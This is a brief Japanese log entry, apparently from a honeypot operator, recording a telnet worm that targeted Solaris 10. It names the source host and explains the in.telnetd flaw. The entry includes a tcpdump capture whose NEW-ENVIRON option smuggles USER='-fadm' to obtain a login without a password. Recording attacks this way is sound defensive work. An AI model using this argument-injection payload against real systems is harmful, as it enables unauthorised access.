telnetワーム
- 10日03時頃.
- 196.43.85.84(Solaris10, TANZANIA-UNITED-REPUBLIC-OF, Dar es Salaam, TANZANIA TELECOMMUNICATIONS CO. LTD, 17hop)
- 100程のアドレスを攻撃.
- Solaris10のtelnetサーバーにUSER環境変数'-fユーザー名'を設定して接続するととそれがそのままexecされるloginに渡され,パスワードなしでログインできるというもの.本来-fオプションはrootでなくては使えないはずだったが,in.telnetdがroot権限で起動しているのが災したらしい.
- tcpdump -vvvv -s0 -Xで表示させた攻撃の様子.今回はadmがターゲットになっている.
Telnet: 0x0000: fffb 1f WILL NAWS 0x0003: fffa 1f00 5000 19ff f0 SB NAWS IS 0x50 0 0x19 SE 0x000c: fffb 18 WILL TERMINAL TYPE 0x000f: fffa 1800 7674 3130 30ff f0 SB TERMINAL TYPE IS 0x76 0x74 0x31 0x30 0x30 SE 0x001a: fffb 27 WILL NEW-ENVIRON 0x001d: fffa 2700 0055 5345 5201 2d66 6164 6dff 0x002d: f0 SB NEW-ENVIRON IS 0 0x55 0x53 0x45 0x52 0x1 0x2d 0x66 0x61 0x64 0x6d SE 0x0030: 0019 fff0 fffb 18ff fa18 0076 7431 3030 ...........vt100 0x0040: fff0 fffb 27ff fa27 0000 5553 4552 012d ....'..'..USER.- 0x0050: 6661 646d fff0 fadm..